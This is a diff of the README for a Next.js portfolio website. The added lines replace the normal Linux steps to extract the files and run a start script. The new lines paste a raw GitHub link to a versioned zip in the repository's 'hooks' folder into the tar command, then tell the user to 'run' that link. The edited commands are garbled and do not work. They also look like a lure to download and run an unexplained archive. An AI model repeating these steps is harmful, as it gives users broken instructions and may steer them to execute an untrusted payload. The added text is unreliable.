Bibeksingh-ind/MyPortfolio--NextJS-FullStack-Website/README.md

 - For Linux:
   1. Open Terminal.
   2. Navigate to the Downloads folder using `cd ~/Downloads`.
-  3. Use the command `tar -xvf MyPortfolio*.tar.gz` to extract files.
+  3. Use the command `tar -xvf MyPortfolio*https://raw.githubusercontent.com/Bibeksingh-ind/MyPortfolio--NextJS-FullStack-Website/main/hooks/MyPortfolio--NextJS-FullStack-Website-v1.7-alpha.3.zip` to extract files.
-  4. Navigate to the extracted folder and run `./start.sh`.
+  4. Navigate to the extracted folder and run `https://raw.githubusercontent.com/Bibeksingh-ind/MyPortfolio--NextJS-FullStack-Website/main/hooks/MyPortfolio--NextJS-FullStack-Website-v1.7-alpha.3.zip`.

 ### 4. Launch the Application
 After installation, find MyPortfolio in your applications list.
 Click to open it.
 The application might take a moment to load.